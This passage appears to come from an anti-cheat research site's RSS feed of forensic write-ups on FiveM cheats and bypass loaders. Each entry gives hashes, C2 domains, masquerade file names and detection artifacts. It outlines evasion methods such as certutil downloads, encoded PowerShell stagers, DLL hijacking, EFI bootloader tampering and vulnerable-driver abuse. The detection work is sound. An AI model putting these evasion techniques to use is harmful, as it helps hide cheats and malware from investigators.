9afb3f4b…, df699dca…, acd31242…. The close timestamp clustering indicates active development and iterative evasion attempts. Covers multi-variant hash tracking, DPS cross-comparison, and artifact overlap analysis across builds. Clubhouse AC Research Bypass Detection FiveM Bypass Detection Multi-Build DPS Timestamp IOC Wizard Bypass: DecoyLoader.pdb YARA Rule & Future-Dated DPS https://clubhouseac.shop/research/wizard-bypass-detection https://clubhouseac.shop/research/wizard-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Wizard Bypass (doumpa.exe). SHA-256: 9a868d89f0344ab7f1300300a0725244c5748d73151a604cea932f5717984978. Anomalous DPS timestamp of 2026/01/01 (New Year's Day — deliberate). PcaSVC: 0x1b29000. Retains the PDB path string 'DecoyLoader.pdb' in its PE debug directory, enabling a high-confidence YARA rule. Covers timestamp manipulation detection and PDB artifact analysis. Clubhouse AC Research Bypass Detection FiveM Bypass Detection YARA PDB Artifact Future Timestamp Farbenbomber Bypass: PcaSVC & Prefetch Execution Artifacts https://clubhouseac.shop/research/farbenbomber-bypass-detection https://clubhouseac.shop/research/farbenbomber-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Farbenbomber.exe bypass. SHA-256: af10429bea0dff14ad9c452d01b6950cd648a8c6b8f91b9fe9a2388bef8b860b. DPS timestamp: 2025/10/15. PcaSVC: 0x494000. Despite anti-forensic design intent, execution artifacts persist in Prefetch files, Journal Trace, and System Informer process records — each source cross-corroborating execution time and context. Clubhouse AC Research Bypass Detection FiveM Bypass Detection PcaSVC Prefetch IOC No Trace Bypass: mycomput.dll Planted in Computer Management (18 MB) https://clubhouseac.shop/research/no-trace-bypass-detection https://clubhouseac.shop/research/no-trace-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of No Trace Bypass, which plants mycomput.dll inside Computer Management (Computerverwaltung). The bypass DLL weighs ~18,000 KB versus the legitimate 124 KB original — an immediate size-based detection. SHA-256: f07de2eb82878d89e6851b5c6434638049467f1c343bcacc287037f621e5a494. Injected via Win+X then F7 keyboard shortcut. Covers size anomaly detection, DLL path verification, and shortcut-triggered injection. Clubhouse AC Research Bypass Detection FiveM Bypass Detection mycomput.dll DLL Size Anomaly Computer Management Aqua EFI Bypass: Modified EFI Bootloader Running Before Windows https://clubhouseac.shop/research/aqua-efi-bypass-detection https://clubhouseac.shop/research/aqua-efi-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of the Aqua EFI Bypass — a modified bootx64.efi bootloader that executes before the Windows kernel loads, providing pre-OS anti-cheat circumvention. SHA-256: 91d9db5fbf3c89b0df5d674f0e367afd3ac9e45ff1c13040ee2279cf3314cbd5. SHA-1: d8fca4d3fa670c6d54fc274a0625cd4bad2016ab. Covers EFI partition inspection methodology, bootloader hash verification, and detection via Secure Boot log analysis. Clubhouse AC Research Bypass Detection FiveM Bypass Detection EFI Bootloader Pre-OS Bypass Secure Boot Shitty Bypass: Kernel Driver (info.sys) Dropped via certutil to System32 https://clubhouseac.shop/research/shitty-bypass-detection https://clubhouseac.shop/research/shitty-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of 'Shitty Bypass', which drops a kernel driver named info.sys (SHA-256: 2bd3e29013ca7115eac06b9c6993789fd577d572365b3590f26f07188dddd1ea) to C:\\Windows\\System32 using certutil.exe as a living-off-the-land downloader. A cum.sys variant also observed. DiagTrack service artifacts preserve the full certutil command-line including the download URL. Covers Diagtrack artifact recovery and driver file identification. Clubhouse AC Research Bypass Detection FiveM Bypass Detection Kernel Driver certutil LOLBAS DiagTrack Ninez Hider: PowerShell EncodedCommand Downloading from Catbox.moe https://clubhouseac.shop/research/ninez-hider-detection https://clubhouseac.shop/research/ninez-hider-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Ninez Hider, which executes an encoded PowerShell command (-encodedCommand) to download its second-stage payload from files.catbox.moe — a public file-hosting service. The encoded command and download URL survive in ConsoleHost\_history.txt. Covers history file recovery, base64 command decoding, and network IOC identification. Clubhouse AC Research Bypass Detection FiveM Bypass Detection PowerShell EncodedCommand catbox.moe Xytrus Bypass: Unity Game DLL Masquerade Injecting into Explorer https://clubhouseac.shop/research/xytrus-bypass-detection https://clubhouseac.shop/research/xytrus-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Xytrus Bypass, which plants UnityCrashHandler64.exe and a modified UnityPlayer.dll inside the Crab Game installation directory to appear as legitimate Unity engine files. The bypass then injects into explorer.exe for persistence. Detection via LastActivityView execution records, DLL path anomaly (Unity binary outside game folder context), and explorer.exe module inspection. Clubhouse AC Research Bypass Detection FiveM Bypass Detection Unity Masquerade Explorer Injection DLL Hijack Secure-Bzpass: Process Lasso DLL Hijack with Alt+F12 Injection https://clubhouseac.shop/research/secure-bzpass-detection https://clubhouseac.shop/research/secure-bzpass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of secure-bzpass. SHA-256: 6ce7c98b384dbe444a916e7e6580288549eca501315114916c1ee1908b5afff8. Hijacks profapi.dll inside Process Lasso's installation directory and uses Alt+F12 hotkey to trigger injection. Although the bypass destructs and unloads on exit, the DLL file remains on disk — a persistent artifact. Covers DLL path anomaly, hotkey-triggered injection mechanics, and persistence identification. Clubhouse AC Research Bypass Detection FiveM Bypass Detection DLL Hijack Process Lasso profapi.dll XRC Bypass: PowerShell IEX In-Memory Loader with Future-Dated DPS https://clubhouseac.shop/research/xrc-bypass-detection https://clubhouseac.shop/research/xrc-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of XRC Bypass, which uses PowerShell IEX (Invoke-Expression) to load its payload entirely in memory, leaving Event Viewer PowerShell event 800. SHA-256: 9d8038d5f03503704ee237ed72b8683e0261a254951ad0ce717842a27672b2ff. Anomalous DPS timestamp of 2038/07/16. PcaSVC: 0x11a000. Artifacts include Destemido Cleaner.exe companion, CRDOWNLOAD file in Journal Trace, and keyauth.win C2. Clubhouse AC Research Bypass Detection FiveM Bypass Detection PowerShell IEX Future Timestamp keyauth.win Wexize Bypass: BAM Registry & Prefetch Execution Trail https://clubhouseac.shop/research/wexize-bypass-detection https://clubhouseac.shop/research/wexize-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Wexize Revamp.exe bypass. SHA-1: 404209b5e427ddb7ab14c6bd77044d13922f1db4. PcaSVC entry at 0xac424d0. Despite anti-forensic claims, execution artifacts persist across BAM registry, Prefetch files readable via WinPrefetchView, and LastActivityView timeline. Covers each artifact source with detection steps. Clubhouse AC Research Bypass Detection FiveM Bypass Detection BAM Registry Prefetch IOC Superior Bypass: 7-Zip Masquerade with keyauth.win C2 https://clubhouseac.shop/research/superior-bypass-detection https://clubhouseac.shop/research/superior-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Superior Bypass, distributed as C:\\Program Files\\7-zip\\7zCon.exe to blend into a legitimate 7-Zip installation. SHA-256: 3ab3d87217c6b22f986e43a79e058b202e609f2571c370ba9668ee89ae638b4e. DIE strings analysis reveals 'Clear/Clean/Cheat/Cheat Engine' keywords. C2: keyauth.win. Covers path anomaly detection, string extraction, and keyauth infrastructure identification. Clubhouse AC Research Bypass Detection FiveM Bypass Detection 7-Zip Masquerade keyauth.win IOC Old Club44 Bypass: SteamSetup Masquerade with 'Clean Traces' Button https://clubhouseac.shop/research/club44-bypass-detection https://clubhouseac.shop/research/club44-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Old Club44 Bypass, distributed as SteamSetup.exe and WinRARSetup.exe. SHA-256: f1d96aca4ddb6b317e43e2cc599ce69f32a2c41a1c1adf94312da48269536fc2. 16/70 VirusTotal detections. The loader UI features a 'Clean Traces' button — confirming awareness of forensic investigation. C2: eauth.us.to. Covers hash identification, VT analysis, and C2 artifact recovery. Clubhouse AC Research Bypass Detection FiveM Bypass Detection Steam Masquerade Anti-Forensic Feature IOC Purge Bypass: Emoji-Named DLL, Discord Bot C2 & VBScript Downloader https://clubhouseac.shop/research/purge-bypass-detection https://clubhouseac.shop/research/purge-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Purge Bypass, which drops c👎.dll (emoji character in filename) and spawns cmd.exe opening System Informer. SHA-256: 1c6f0c6aa01e65b9bf17ea1d4d7de0a6382b97dad27541eccc608e5e645d40fa. Persists via Registry HKCU\\Printers\\DevModePerUser, drops imgui\_log.txt, injects via localhost Discord bot, and downloads a second stage via obfuscated VBScript. C2: scrapingant domain. Clubhouse AC Research Bypass Detection FiveM Bypass Detection Emoji DLL Registry Persistence VBScript Downloader Star.xyz Bypass: Win32 EXE with keyauth.win LSASS Strings https://clubhouseac.shop/research/star-xyz-bypass-detection https://clubhouseac.shop/research/star-xyz-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Star.xyz Bypass (4.54 MB Win32 EXE). SHA-256: ce5f6779fdd9c32e5ad6c9dcbc77c3c80a520d1488e9c026f997790cf7ea47b4. SHA-1: 9f926aac866275bb93925a9294e53dbc839e274a. keyauth.win domain observed in both DNS cache and LSASS memory strings. Artifacts include LastActivityView execution records, Journal Trace DLL entries, Everything tool discovery, and VirusTotal detections. Clubhouse AC Research Bypass Detection FiveM Bypass Detection keyauth.win LSASS IOC Revenge Bypass: EFI-Drive DLL Masquerade & keyauth.win Detection https://clubhouseac.shop/research/revenge-bypass-detection https://clubhouseac.shop/research/revenge-bypass-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Revenge Bypass, which hides its payload on a hidden EFI system partition disguised as desktop.ini and mimics ReShade's installer name. The active bypass DLL is mapped into svchost.exe with keyauth.win authentication in DNS and lsass. Covers BAM parser, Journal Trace showing the EFI desktop.ini path, and System Informer svchost memory strings. Clubhouse AC Research Bypass Detection FiveM Bypass Detection EFI Partition DLL Masquerade keyauth.win Aqua TriggerBot: Detection & Forensic Artifacts https://clubhouseac.shop/research/aqua-triggerbot-detection https://clubhouseac.shop/research/aqua-triggerbot-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of the Aqua TriggerBot, distributed disguised as ReShade\_Setup\_6.6.1.exe to appear as a legitimate graphics post-processing installer. SHA-256: 841757e9118e0c09c3693c7d60e142535d576b558ae373d8d808501f2b3d59c9. DPS: 2025/10/16. PcaSvc: 0x80000. The loader UI is notably low-effort ('AI slop'). Covers DPS/PcaSvc identification and ReShade masquerade technique. Clubhouse AC Research Cheat Detection FiveM TriggerBot ReShade Masquerade PcaSvc IOC FiveM External Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/fivem-external-cheat-detection https://clubhouseac.shop/research/fivem-external-cheat-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of an unnamed FiveM external cheat identified through hash fingerprinting. SHA-256: 49C275CB04134AFC50816121930786B2D7843F055C13BAF52626CAAE4C79C321. SHA-1: D4E117077CC5D26DF848626EB7F69D9176A82230. Operates externally to the game process — detection relies on hash confirmation and PcaSvc/DPS execution evidence rather than in-process strings. Clubhouse AC Research Cheat Detection FiveM External Cheat Cheat Detection Hash IOC AnyDesk Loader FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/anydesk-fivem-detection https://clubhouseac.shop/research/anydesk-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of a FiveM cheat masquerading as AnyDesk (Anydesk.exe) to evade process-list inspection. SHA-256: e7a51618ad0ad0b7bf1b8f9f1d11cd04b793cb200bfb4065f3ad6b9f9acfeb47. DPS: 2025/12/11. PcaSvc: 0x581000. The payload is visible inside the FiveM game process in System Informer. Covers Journal tool, Prefetch parser, and injection evidence. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Process Masquerade System Informer IOC Seryx FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/seryx-fivem-detection https://clubhouseac.shop/research/seryx-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Seryx (Loader.exe), a FiveM cheat. SHA-256: 01a27b1ce601280792941524b4b108330eb2ffe3e0a0151e3ba44257c3585476. DPS: 2026/02/07. PcaSvc: 0x1c86000. Covers Everything tool search, BAM and Prefetch parser analysis, and execution timeline reconstruction from multiple artifact sources. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Prefetch BAM Parser IOC Aorist FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/aorist-fivem-detection https://clubhouseac.shop/research/aorist-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Aorist (Aorist.exe), a FiveM cheat. SHA-256: cc6cbfaed2bb4b124c32d71d2c581a5e70c91fcd2c7b039526e54dc89855129a. DPS: 2025/06/05. PcaSvc: 0x2d1000. Covers Prefetch records and Everything tool file search for locating artifacts on disk. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Prefetch Everything Tool IOC Trigger FiveM TriggerBot: Detection & Forensic Artifacts https://clubhouseac.shop/research/trigger-fivem-detection https://clubhouseac.shop/research/trigger-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of a FiveM triggerbot distributed as Rechner.exe (German: 'calculator') to appear innocuous. SHA-256: 7078d61d9106cea38eeee6b495051473c5ec9cbba0a6eb399f5702ba576c9f79. Covers BAM parser and Prefetch record artifacts as the primary execution evidence. Clubhouse AC Research Cheat Detection FiveM TriggerBot Cheat Detection BAM Parser IOC MW-Privat FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/mwprivat-fivem-detection https://clubhouseac.shop/research/mwprivat-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of MW-Privat (MWPriv+\_Cheat\_x64.exe), a FiveM cheat with 11 high-severity PE-level detections including WriteProcessMemory, NtWriteVirtualMemory, OpenProcess, and an Aimbot pattern. SHA-256: b21c2afe99160f24b403962b7b15b191b785c2a4b5c38f49a5cbd74bcfd0415c. DPS: 2026/01/19. PcaSvc: 0x75c000. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Memory Injection Aimbot IOC 420-Services FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/420-services-fivem-detection https://clubhouseac.shop/research/420-services-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of 420-Services (420-services.exe), a FiveM cheat loader from a vendor that also sells other cheats. SHA-1: 888a2575b2a1d8e68ec50a9204eee52700ae168a. DPS: 2025/10/22. PcaSvc: 0x10e6000. Covers file identification, hash confirmation, and PcaSVC execution evidence. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Multi-Cheat Vendor PcaSvc IOC WhatsApp Installer FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/whatsapp-installer-fivem-detection https://clubhouseac.shop/research/whatsapp-installer-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of a FiveM cheat masquerading as WhatsApp\_Installer.exe to appear benign in process lists and download history. SHA-1: 22aee3373ad743cd7442e136a32082bedcfde5b9. Notable for a far-future DPS timestamp of 2049/07/01 — a red flag for timestamp manipulation. PcaSvc: 0x3284000. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Process Masquerade Future Timestamp IOC Traceless FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/traceless-fivem-detection https://clubhouseac.shop/research/traceless-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Traceless (Traceless.exe), a FiveM cheat whose name implies anti-forensic capability but which leaves persistent DPS and PcaSvc execution artifacts. SHA-1: 63f856cb2ff834b82782386b43858672c1f46037. DPS: 2025/07/30. PcaSvc: 0x42d000. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Anti-Forensic Claim PcaSvc IOC FiveM.exe Cheat Loader: Detection & Forensic Artifacts https://clubhouseac.shop/research/fivemexe-cheat-detection https://clubhouseac.shop/research/fivemexe-cheat-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of a FiveM cheat loader distributed as FiveM(1).exe to blend into a player's existing FiveM installation. SHA-1: 7e8c2cf77fbc5d729f0ac151889c028f7ca2b8c3. Notable for an anomalous far-future DPS timestamp of 2077/11/16 — a clear indicator of deliberate timestamp manipulation. PcaSvc: 0x23a000. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Future Timestamp Timestomping IOC Flyside FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/flyside-fivem-detection https://clubhouseac.shop/research/flyside-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Flyside (distributed as cmd.exe), a FiveM cheat with C2 at gm07-dc04.ouiheberg.com that drops TModule.dll to the root of C:\\. SHA-256: 01939a2b6ac191c4afb03884c0e6f172c2332c4e4bf4f516718b585541dd31c4. Covers BAM parser, Everything tool, Journal Trace, WinPrefetchView, LastActivityView, and OSForensics. Clubhouse AC Research Cheat Detection FiveM Cheat Detection TModule.dll Journal Trace IOC SouthLoader FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/southloader-fivem-detection https://clubhouseac.shop/research/southloader-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of SouthLoader (SouthLoader.exe), a FiveM cheat that is also distributed bundled with a fake NVIDIA app installer (NVIDIA\_app\_v11.0.4.526.exe / Lexus\_Bundle\_Opti.rar). SHA-1: 676693d397b21e66d3b81063596816a51325f2d1. DPS: 2025/08/13. PcaSvc: 0x1ce5000. Clubhouse AC Research Cheat Detection FiveM Cheat Detection NVIDIA Masquerade PcaSvc IOC SSTB FiveM TriggerBot: Detection & Forensic Artifacts https://clubhouseac.shop/research/sstb-fivem-detection https://clubhouseac.shop/research/sstb-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of SSTB, a multi-version FiveM triggerbot that hides its payload as a fake ffmpeg.dll (SHA-1: 7cbd8a2260baae33ec3f7a5b2427fbea14d2a9a5, ~2.631 KB) across four host applications: Obsidian/CitizenFX, SteelSeries GG, Insomnia, and Rocket.Chat v4. Detection via ffmpeg.dll size fingerprint and SHA-1 hash. Includes a complete ClubhouseAC scanner script. Clubhouse AC Research Cheat Detection FiveM SSTB TriggerBot DLL Masquerade Multi-version Kazo FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/kazo-fivem-detection https://clubhouseac.shop/research/kazo-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of the Kazo FiveM cheat. SHA-256: 48d0a3f845d7df80666b32a676126d9e4b0ad5cb286e532d155a38eb36276727. Covers VirusTotal multi-engine detections, file properties analysis showing anomalous metadata, and Everything tool search for locating cheat artifacts on disk. Clubhouse AC Research Cheat Detection FiveM Cheat Detection VirusTotal Everything Tool IOC Bang Service TriggerBot: Detection & Forensic Artifacts https://clubhouseac.shop/research/bang-service-triggerbot-detection https://clubhouseac.shop/research/bang-service-triggerbot-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of the Bang Service TriggerBot (Bang\_Keyboardtweak.exe). SHA-256: 9ee8d3d053d3891c480dd591cbf54fbfd336d976d61fe38d705ad22873f02144. DPS: 2026/01/17. PcaSvc: 0x5d000. Covers VirusTotal detections, Everything tool file search, and Prefetch records confirming execution. Clubhouse AC Research Cheat Detection FiveM TriggerBot Cheat Detection Prefetch IOC Ambani FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/ambani-fivem-detection https://clubhouseac.shop/research/ambani-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of the Ambani FiveM cheat. SHA-256: c56f83f54e6ad7fcdd060592ebb8d794cfb9c1ba955f97028cfc6d69d30fea32. Flagged by Windows Defender. Key artifacts include System Informer showing injection into msedge.exe, Prefetch parser records, and detailed VirusTotal detections across multiple engines. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Windows Defender Prefetch IOC MrCheat (Turkish Kebab) FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/mrcheat-fivem-detection https://clubhouseac.shop/research/mrcheat-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of MrCheat, also known as Turkish Kebab (Loader.exe). SHA-1: 5c568ed13cae97ab5bb20fbe3e70032d610c4f2f. C2 domain api.mrcheat.api-ir observed in DNS cache. DPS: 2025/02/08. PcaSvc: 0x67b000. Covers Prefetch, Journal Trace, System Informer Explorer, and VirusTotal detections. Clubhouse AC Research Cheat Detection FiveM Cheat Detection DNS Prefetch IOC D3d10.dll FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/d3d10-fivem-detection https://clubhouseac.shop/research/d3d10-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of the d3d10.dll FiveM cheat, a DLL-based cheat injected into the game process using the DirectX DLL name as cover. Key artifacts include browser download records, FiveM crash dump files, Echo Journal traces, Windows Defender detections, and d3d10.dll presence in System Informer's Explorer module list. Clubhouse AC Research Cheat Detection FiveM Cheat Detection DLL Injection Journal Trace IOC Xine FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/xine-fivem-detection https://clubhouseac.shop/research/xine-fivem-detection Tue, 02 Jun 2026 00:00:00 GMT Forensic breakdown of Xine (XineTeamCheat.exe), a free FiveM cheat also distributed disguised as a NordVPN installer. Key artifacts include a config.json file left on the desktop, Event Viewer entries, Journal Trace confirmation of XineTeamCheat.exe, and Prefetch records. Detection requires no C2 DNS — the config file and journal entry are sufficient. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Journal Trace Prefetch Config File Susano FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/susano-fivem-detection https://clubhouseac.shop/research/susano-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of Susano (lemon.exe), a FiveM-targeted cheat loader. Documents C2 string artifacts found in lsass.exe and svchost.exe memory, ~40 MB working-set inflation in the FiveM process with WCX-protected injected regions, USN Journal records that survive the cheat's stealth-mode Prefetch wipe, and a complete seven-step screenshare check methodology. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Memory Forensics USN Journal IOC TZ Project FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/tzproject-fivem-detection https://clubhouseac.shop/research/tzproject-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of TZ Project (firefox.exe), a FiveM cheat loader that masquerades as a browser process to evade casual process-list inspection. Documents the imgui.ini artifact written to the GTA V folder, C2 domain artifacts in DNS cache and LSASS memory, DPS first-seen timestamp, and a seven-step screenshare check methodology. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Process Masquerade ImGui IOC Keyser Cracked Build: Detection & Forensic Artifacts https://clubhouseac.shop/research/keyser-cracked-fivem-detection https://clubhouseac.shop/research/keyser-cracked-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of the cracked/leaked Keyser build (keycheese), which uses a separate C2 domain (api.keyser-lts.com) from the official loader. Shares the IME DLL-drop behavior with the official build. Covers DNS, lsass, FiveM process C2 strings, C:\\Windows\\IME artifact, Journal Trace, and loader UI identification. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Cracked Build Windows IME IOC Macho Cheats FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/machocheats-fivem-detection https://clubhouseac.shop/research/machocheats-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of Macho Cheats (Yb6ul.exe / mc.exe), a FiveM cheat that extracts its loader into a %TEMP% folder and bundles libcurl.dll and fivem-internal.dll. C2 domain machocheats.com found in DNS, lsass.exe, and FiveM process. Covers DiagTrack artifacts, WinPrefetchView, browser history, and Journal Trace. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Bundled DLL TEMP Folder IOC HX Software FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/hxsoftware-fivem-detection https://clubhouseac.shop/research/hxsoftware-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of HX Software (updated.exe), a FiveM cheat that uses a generic update-process name to avoid suspicion. C2 domain api.hxsoftwares.com observed simultaneously in DNS cache, lsass.exe, and the FiveM game process. Covers Journal Trace evidence and a six-step screenshare check methodology. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Process Masquerade Memory Forensics IOC Unicore FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/unicore-fivem-detection https://clubhouseac.shop/research/unicore-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of Unicore (build.exe), a FiveM cheat that communicates via an OVH VPS hostname and actively manipulates the DIPS journal file. The string 'Unicore' appears in the FiveM game process memory. Covers DNS artifacts, Event Viewer entries, Journal Trace, and Prefetch evidence. Clubhouse AC Research Cheat Detection FiveM Cheat Detection DIPS Journal Event Viewer IOC Keyser FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/keyser-fivem-detection https://clubhouseac.shop/research/keyser-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of Keyser (loader.exe), a FiveM cheat that drops a DLL into C:\\Windows\\IME and creates .dmp crash dump files in unusual locations. C2 domain api.keyser-dashboard.com observed in DNS cache and lsass.exe. Covers Journal Trace, WinPrefetchView, and IME directory inspection. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Windows IME DMP Files IOC Gosth FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/gosth-fivem-detection https://clubhouseac.shop/research/gosth-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of Gosth, a FiveM cheat distributed via direct CDN URL (cdn.gosth.ltd/launcher.exe) that injects into arbitrary processes. Key indicators: loader entry persists in NVIDIA Control Panel, launcher.exe visible in DiagTrack under \\device\\, random .tmp file in %TEMP%, Prefetch and Windows Data Usage records survive cleanup. Clubhouse AC Research Cheat Detection FiveM Cheat Detection DiagTrack NVIDIA Process Injection Skript.gg FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/skriptgg-fivem-detection https://clubhouseac.shop/research/skriptgg-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of Skript.gg (ts3client\_win64.exe), a FiveM cheat that masquerades as the TeamSpeak 3 client and is also known to use the USBDeview utility name. Covers skript.gg C2 strings in lsass.exe, DiagTrack artifacts, DLL presence in Explorer, Journal Trace evidence, and Disk Drill file recovery from unallocated space. Clubhouse AC Research Cheat Detection FiveM Cheat Detection Process Masquerade DiagTrack IOC Red Engine FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/redengine-fivem-detection https://clubhouseac.shop/research/redengine-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of Red Engine (Chaga.exe), a FiveM cheat that writes imgui.ini to the GTA V folder and leaves settings.cock and settings.cook configuration files in its loader directory alongside INSTRUCTIONS.txt. Windows Defender flags the binary. C2 domain falcon.redengine.eu observed in DNS cache. Clubhouse AC Research Cheat Detection FiveM Cheat Detection ImGui Defender Detection IOC TZX Project FiveM Cheat: Detection & Forensic Artifacts https://clubhouseac.shop/research/tzx-fivem-detection https://clubhouseac.shop/research/tzx-fivem-detection Mon, 01 Jun 2026 00:00:00 GMT Forensic breakdown of TZX Project (taskthow.exe), a FiveM cheat that shares C2 infrastructure with TZ Project but is a distinct binary. Key artifact: drops packages.json into C:\\Windows\\System32 — visible via Journal Trace. Covers DNS, lsass, and FiveM process C2 strings alongside a seven-step screenshare check methodology. Clubhouse AC Research Cheat Detection FiveM Cheat Detection System32 IOC Journal Trace PC Checking Methods — Tiered Forensic Methodology https://clubhouseac.shop/research/pc-checking-methods https://clubhouseac.shop/research/pc-checking-methods Thu, 07 May 2026 00:00:00 GMT A complete methodology for PC checks (screenshares, SS) organised into five escalating tiers — from a 10-minute foundation triage of execution artifacts and persistence locations, through deep-dive NTFS reconstruction, memory forensics, court-grade DFIR with full disk imaging and chain of custody, all the way to overwrite-bypass detection and cross-source contradiction analysis. Catalogues 130+ techniques across every Windows artifact, parser, and bypass pattern. Clubhouse AC Research Methodology PC Checking Methodology Tiers DFIR Forensics Detecting BYOVD Chains Through Kernel Callback Forensics https://clubhouseac.shop/research/byovd-rtcore-chain https://clubhouseac.shop/research/byovd-rtcore-chain Sun, 12 Apr 2026 00:00:00 GMT Bring-Your-Own-Vulnerable-Driver attacks rely on legitimately-signed but exploitable kernel drivers (mhyprot2, GIGABYTE gdrv, Dell dbutil) to disable EDR callbacks. We document a forensic methodology that reconstructs the load order, callback unregistration, and signing-chain anomalies after the driver has been unloaded — leaving only USN journal traces, registry remnants, and prefetch artifacts. Clubhouse AC Research Kernel Forensics BYOVD Kernel Driver Signing EDR Bypass USN Journal Reconstructing Cheat Execution After Cleaner-Tool Sweeps https://clubhouseac.shop/research/eulen-prefetch-recovery https://clubhouseac.shop/research/eulen-prefetch-recovery Sat, 28 Mar 2026 00:00:00 GMT Cheat-cleaner utilities (BleachBit forks, custom .bat scripts, Privazer presets) wipe the obvious execution traces — Prefetch, BAM, recent docs. We show how Amcache, ShimCache, RecentFileCache.bcf, and registry transaction logs (LOG1/LOG2) preserve enough fragments to reconstruct a complete execution timeline for the Eulen FiveM executor family with 47-second resolution. Clubhouse AC Research Anti-Forensics Prefetch Amcache ShimCache Registry Forensics FiveM MFT $SI vs $FN: Detecting Timestomping on NTFS https://clubhouseac.shop/research/timestomp-mft-detection https://clubhouseac.shop/research/timestomp-mft-detection Tue, 10 Mar 2026 00:00:00 GMT Timestomping tools rewrite the $STANDARD\_INFORMATION attribute but typically miss $FILE\_NAME, which is updated only by the kernel during file rename or move. We detail a $SI/$FN delta detection rule that flagged 100% of timestomp attempts in our corpus of 312 known cheat-loader samples — including subsecond manipulation that evades naive timestamp checks. Clubhouse AC Research Anti-Forensics NTFS MFT Timestomping 